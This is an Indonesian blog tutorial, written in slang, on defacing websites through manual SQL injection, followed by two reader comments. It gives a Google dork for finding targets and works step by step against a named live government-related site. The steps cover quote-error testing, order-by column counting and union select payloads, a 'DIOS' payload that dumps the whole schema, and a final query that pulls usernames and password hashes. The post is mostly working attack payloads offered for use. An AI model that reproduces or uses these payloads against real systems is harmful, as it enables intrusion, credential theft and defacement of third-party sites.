MASIGNCLEAN101

Tutorial Deface SQL Injection Manual


Halo gaes kembali lagi sama w dav gans :v kali ini w mau bagi tutorial cara deface dengan sql injection manual, oke sedikit penjelasan tentang sql injection adalah tehnik masukan query pada url target untuk mencuri data seperti username atau password yang ada di database. oke langsung ke tutorial nya.. :v

Dork: 
- inurl:berita_more.php?id=
Cuma contoh kembangin sendiri :v

1. Anggap saja kita sudah menemukan target "http://kec-tanggulangin.rumahkoding.net/berita_more.php?id=9"

2. Tambahkan tanda petik (') di akhir nomer url target gaes :v http://kec-tanggulangin.rumahkoding.net/berita_more.php?id=9'

Kalo terjadi error atau blank pada web nya itu menandakan vuln  "You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1"



3. Selanjutnya kita hitung culumns database nya, dengan memasukan perintah order+by+1-- dan seterusnya sampai terjadi error atau blank..

Contoh: 
/berita_more.php?id=9+order+by+1-- No Error
/berita_more.php?id=9+order+by+2-- No Error
/berita_more.php?id=9+order+by+3-- No Error
/berita_more.php?id=9+order+by+4-- No Error
/berita_more.php?id=9+order+by+5-- No Error
/berita_more.php?id=9+order+by+6-- No Error
/berita_more.php?id=9+order+by+7-- Error :v
Nah error gaes :v berarti jumlah columns nya 6, kalo error nya di nomer 7 berarti jumlah nya 6 :v



4. Selanjutnya ganti kata order+by dengan kata union+select, jangan lupa sebelum angka 9 tambahin strip (-)
http://kec-tanggulangin.rumahkoding.net/berita_more.php?id=-9+union+select+1,2,3,4,5,6--
hasil nya akan seperti ini :v



5. Selanjutnya kita cek version database tersebut, Angka 2 dari Angka togel yang keluar di atas gaes :v
Ganti nomer dua dengan @@version atau version() Contoh: http://kec-tanggulangin.rumahkoding.net/berita_more.php?id=-9+union+select+1,version(),3,4,5,6--


versi databse nya 10 kalo dapet versi 4 mending buang aja deh :v karena ribet harus nembak tabel satu per satu :v

6. Selanjutnya Kata @@version atau version() ganti dengan ini gaes :v
(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)[email protected]:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))
oh iya disini w menggunakan DIOS MADBLOOD Karena rapih dan gak ribet menurut w sih :v
Hasil nya akan seperti ini gaes :v



7. Selanjutnya ganti kata (Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)[email protected]:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))
dengan kata group_concat(username,0x3a,password) dan jangan lupa di belakang 3,4,5,6 tambah from+user_login--+-



8. Dan Seleai sudah :v ini cuma buat pelajaran gaes itu password gak bisa di decrypt,.


jika kalian bingung dengan type hash kalian bisa cek menggunakan tools hash indentify
Hash ID

oke cukup sekian tutorial dari saya gaes :v dan jangan lupa share biar kami semangat bikin tutorial lain nya :v

Baca juga:
 
Share This :
Davnsial ID

Penggemar coding. Seseorang yang suka belajar sesuatu yang baru. terutama tentang pemrograman web dan desain web. senang berbagi tentang pengetahuan dan belajar dari orang lain.

avatar

W dah ngerti kntl. Yang susah racik dork wkwkwk

August 5, 2018 at 5:59 AM
avatar

yang susah tuh bukan dork tapi admin login nya :>)

August 5, 2018 at 6:38 AM